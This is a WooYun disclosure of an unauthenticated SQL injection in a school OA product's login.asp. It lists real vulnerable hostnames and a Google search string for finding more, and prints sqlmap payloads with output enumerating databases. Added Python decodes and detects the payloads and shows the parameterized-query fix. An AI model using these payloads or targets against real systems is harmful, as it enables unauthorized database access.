
Vulnerability summary

Defect ID: wooyun-2014-061236

Title: Unauthenticated SQL injection in an OA system (demonstrated on the vendor's official demo site)

Vendor: cncert National Internet Emergency Center (CNCERT)

Author: xfkxfk

Submitted: 2014-05-19 14:44

Fix time: 2014-08-17 14:48

Published: 2014-08-17 14:48

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure timeline:

2014-05-19: details sent to the vendor, awaiting vendor handling
2014-05-24: vendor confirmed; details visible to the vendor only
2014-05-27: details opened to third-party security partners
2014-07-18: details opened to core white hats and domain experts
2014-07-28: details opened to regular white hats
2014-08-07: details opened to intern white hats
2014-08-17: details disclosed to the public

Summary:

An OA system has an unauthenticated SQL injection; the vendor's own official demo site is affected.
The product is used by schools and education departments, so the user base is large and the exposure is substantial.

Details:

Guangzhou Yingfeng Information Technology Co., Ltd. (广州市颖峰信息科技有限公司)
http://www.yfidea.com/product.asp
Official demo site:
http://demo.yfidea.com/
Official customer cases:
http://www.yfidea.com/AnLi.asp
Google search for deployments:
Google keyword: 技术支持:创想颖峰
Results: 43,400
Judging from the vendor site and the search results, the user base is large.
http://oa.bh5z.net/Index.asp
http://222.178.145.174:8000/Index.asp
http://oa.gz65.com/
http://hsoa.bgyhs.net/
http://www.xmqwzx.com/Index.asp
http://oa.lhljzx.com/
......
All of these instances are injectable.
The login page of this OA is injectable through the UserName parameter, with no authentication required:
http://demo.yfidea.com/login.asp?username=123&submit2=+&Password=123

Proof:

Official demo site: http://demo.yfidea.com/

---
Place: GET
Parameter: username
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=123'; WAITFOR DELAY '0:0:5'--&submit2= &Password=123
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=123' WAITFOR DELAY '0:0:5'--&submit2= &Password=123
---
[02:19:04] [INFO] testing Microsoft SQL Server
[02:19:04] [INFO] confirming Microsoft SQL Server
[02:19:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2000
[02:19:04] [INFO] fetching database names
[02:19:04] [INFO] fetching number of databases
[02:19:04] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[02:19:04] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[02:19:19] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
7
[02:19:30] [INFO] retrieved:
[02:19:41] [INFO] adjusting time delay to 1 second due to good response times
master
[02:20:32] [INFO] retrieved: model
[02:21:26] [INFO] retrieved: msdb
[02:22:03] [INFO] retrieved: Northwind
[02:23:37] [INFO] retrieved: pubs
[02:24:18] [INFO] retrieved: tempdb
[02:25:18] [INFO] retrieved: YFWebOA
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] YFWebOA


Google search case: http://oa.bh5z.net/

---
Place: GET
Parameter: username
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=123' AND 4825=CONVERT(INT,(SELECT CHAR(113)+CHAR(121)+CHAR(116)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4825=4825) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(112)+CHAR(121)+CHAR(113))) AND 'KFPk'='KFPk&submit2= &Password=123
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: username=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(121)+CHAR(116)+CHAR(107)+CHAR(113)+CHAR(86)+CHAR(115)+CHAR(88)+CHAR(66)+CHAR(118)+CHAR(97)+CHAR(116)+CHAR(74)+CHAR(75)+CHAR(106)+CHAR(113)+CHAR(121)+CHAR(112)+CHAR(121)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &submit2= &Password=123
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=123'; WAITFOR DELAY '0:0:5'--&submit2= &Password=123
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=123' WAITFOR DELAY '0:0:5'--&submit2= &Password=123
---
[02:22:11] [INFO] testing Microsoft SQL Server
[02:22:12] [INFO] confirming Microsoft SQL Server
[02:22:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[02:22:12] [INFO] fetching database names
[02:22:12] [INFO] the SQL query used returns 7 entries
[02:22:13] [INFO] retrieved: "master"
[02:22:13] [INFO] retrieved: "model"
[02:22:13] [INFO] retrieved: "msdb"
[02:22:13] [INFO] retrieved: "Northwind"
[02:22:13] [INFO] retrieved: "pubs"
[02:22:13] [INFO] retrieved: "tempdb"
[02:22:14] [INFO] retrieved: "YFWebOA"
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] YFWebOA
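
The sqlmap payloads printed above build their string literals out of CHAR() concatenations, which is also how they appear in web server logs. The following Python is an added example, not from the report or the vendor: it decodes those CHAR() runs back into the literals (exposing the q...q boundary strings sqlmap wraps extracted values in) and tags the four injection techniques sqlmap reported. It runs over constructed log lines in a simplified W3C-style format (date time method uri-stem uri-query status); that format, the timestamps and the non-attack username are assumptions, and real IIS logs carry more fields.

```python
"""Decode and classify the login.asp injection payloads from the sqlmap output
above, run over constructed IIS-style log lines. Added example; not part of the
original report or the vendor's code. The log format is assumed.
"""
import re
from urllib.parse import parse_qs, quote_plus

# Raw payloads exactly as sqlmap printed them in the report (before URL encoding).
STACKED = "123'; WAITFOR DELAY '0:0:5'--"
ERROR_BASED = ("123' AND 4825=CONVERT(INT,(SELECT CHAR(113)+CHAR(121)+CHAR(116)+CHAR(107)"
               "+CHAR(113)+(SELECT (CASE WHEN (4825=4825) THEN CHAR(49) ELSE CHAR(48) END))"
               "+CHAR(113)+CHAR(121)+CHAR(112)+CHAR(121)+CHAR(113))) AND 'KFPk'='KFPk")
UNION = ("123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(121)+CHAR(116)"
         "+CHAR(107)+CHAR(113)+CHAR(86)+CHAR(115)+CHAR(88)+CHAR(66)+CHAR(118)+CHAR(97)"
         "+CHAR(116)+CHAR(74)+CHAR(75)+CHAR(106)+CHAR(113)+CHAR(121)+CHAR(112)+CHAR(121)"
         "+CHAR(113),NULL,NULL,NULL,NULL,NULL-- ")


def log_line(username: str, status: int) -> str:
    """Build one constructed W3C-style line: date time method uri-stem uri-query status."""
    query = "username=%s&submit2=+&Password=123" % quote_plus(username)
    return "2014-05-19 02:22:12 GET /login.asp %s %d" % (query, status)


# Constructed sample log: three sqlmap probes and one ordinary login (assumed user).
SAMPLE_LOG = "\n".join([
    log_line(STACKED, 200),
    log_line(ERROR_BASED, 500),   # CONVERT(INT, 'qytkq1qypyq') raises a DB error page
    log_line(UNION, 200),
    log_line("zhangsan", 200),
])

# A run of CHAR(n)+CHAR(m)+... ; greedy, but backtracks so a trailing '+' is not consumed.
CHAR_RUN = re.compile(r"(?:CHAR\(\d+\)\+)*CHAR\(\d+\)", re.IGNORECASE)


def decode_char_runs(sql: str) -> str:
    """Replace every CHAR(n)+CHAR(m)+... run with the string literal it builds."""
    def repl(m):
        codes = re.findall(r"CHAR\((\d+)\)", m.group(0), re.IGNORECASE)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAR_RUN.sub(repl, sql)


SIGNATURES = [
    ("stacked-queries", re.compile(r";\s*WAITFOR\s+DELAY", re.IGNORECASE)),
    ("time-based", re.compile(r"WAITFOR\s+DELAY", re.IGNORECASE)),
    ("error-based", re.compile(r"CONVERT\s*\(\s*INT\s*,", re.IGNORECASE)),
    ("union", re.compile(r"UNION\s+ALL\s+SELECT", re.IGNORECASE)),
    # sqlmap delimits extracted values with q<three letters>q boundary strings.
    ("sqlmap-marker", re.compile(r"'q[a-z]{3}q")),
]


def analyze_log(text: str) -> list:
    """Return one finding per /login.asp request whose decoded username matches a signature."""
    findings = []
    for line in text.splitlines():
        fields = line.split(" ")
        if len(fields) < 6 or fields[3] != "/login.asp":
            continue
        params = parse_qs(fields[4], keep_blank_values=True)
        username = params.get("username", [""])[0]
        decoded = decode_char_runs(username)
        tags = [name for name, rx in SIGNATURES if rx.search(decoded)]
        if tags:
            findings.append({"status": int(fields[5]), "decoded": decoded, "tags": tags})
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["status"], f["tags"], f["decoded"])
```

Decoding before matching matters: a rule that only looks for quoted strings would miss the CHAR() form, and the decoded error-based payload makes the technique obvious, since CONVERT(INT, 'qytkq1qypyq') can only fail and the failure message carries the value between the markers.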

Fix:

Filtering the input is the minimum. The proper fix is to stop concatenating the request parameters into the SQL text and use parameterized queries (in classic ASP, an ADODB.Command with Parameters), so that quotes, semicolons and comment markers in the value are treated as data rather than syntax.
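
To make the fix concrete, the Python below is an added example and not the vendor's ASP code: it renders the kind of string-built query that lets the stacked payload from the proof become a second statement, then shows the parameterized form in which the same value is just an unknown username. SQLite stands in for SQL Server 2000, and the Users table with UserName and Password columns is an assumption.

```python
"""Vulnerable string-built login query versus the parameterized form.
Added example, not the vendor's code; SQLite stands in for SQL Server, and the
Users(UserName, Password) table is assumed."""
import sqlite3


def build_query_unsafe(username: str, password: str) -> str:
    """The bug class behind login.asp: request values spliced into the SQL text."""
    return "SELECT UserName FROM Users WHERE UserName='%s' AND Password='%s'" % (
        username, password)


def statements(sql: str) -> list:
    """Split on ';' outside single-quoted strings (simplified: ignores comments),
    enough to show how one request parameter turns into two statements."""
    parts, cur, in_str = [], "", False
    for ch in sql:
        if ch == "'":
            in_str = not in_str
        if ch == ";" and not in_str:
            parts.append(cur.strip())
            cur = ""
        else:
            cur += ch
    if cur.strip():
        parts.append(cur.strip())
    return parts


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the YFWebOA database with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('admin', 's3cret')")
    return conn


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized form: the value travels separately from the SQL text, so
    quotes, semicolons and '--' inside it are data, never syntax. In classic ASP
    the equivalent is an ADODB.Command with Parameters instead of string joins."""
    row = conn.execute(
        "SELECT UserName FROM Users WHERE UserName=? AND Password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    stacked = "123'; WAITFOR DELAY '0:0:5'--"   # stacked-queries payload from the report
    sql = build_query_unsafe(stacked, "123")
    print(sql)
    for i, s in enumerate(statements(sql), 1):
        print("statement %d: %s" % (i, s))
    conn = make_db()
    print(login_safe(conn, stacked, "123"))      # no such user, and no delay
    print(login_safe(conn, "admin", "s3cret"))   # admin
```

The rendered query shows why blacklist filtering is fragile: the attacker only needs one quote to close the literal and a comment marker to discard the rest, and every other character is legitimate SQL. With placeholders the driver never rebuilds the statement text from the value, so there is nothing to filter.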

Copyright: when reposting, credit the source xfkxfk@WooYun


Vendor response

Vendor reply:

Severity: High

Rank: 13

Confirmed: 2014-05-24 12:41

Vendor comment:

CNVD confirmed and reproduced the reported cases. CNVD first notified the software vendor through public contact channels, and the vendor confirmed that the test site had been fixed. The case was then passed to the Guangdong branch for continued follow-up; the software vendor reported that version 3.93 had fixed the issue. After careful testing, the Guangdong branch confirmed that the vulnerability still exists, and coordination is ongoing.

Latest status:

None yet


Comments:

  1. 2014-05-19 14:48 | U神 ( Core white hat | Rank:1285 Vulns:142 | Thanks WooYun, I never forget a kindness; actually I've always quietly been at WooYun...)

    I really don't get it: why do your submissions get reviewed so fast?

  2. 2014-05-19 14:50 | xfkxfk Verified white hat ( Core white hat | Rank:2179 Vulns:338 | Heh!)

    @U神 It was from Saturday.

  3. 2014-05-19 14:52 | U神 ( Core white hat | Rank:1285 Vulns:142 | Thanks WooYun, I never forget a kindness; actually I've always quietly been at WooYun...)

    @xfkxfk Mine from Friday still hasn't been reviewed.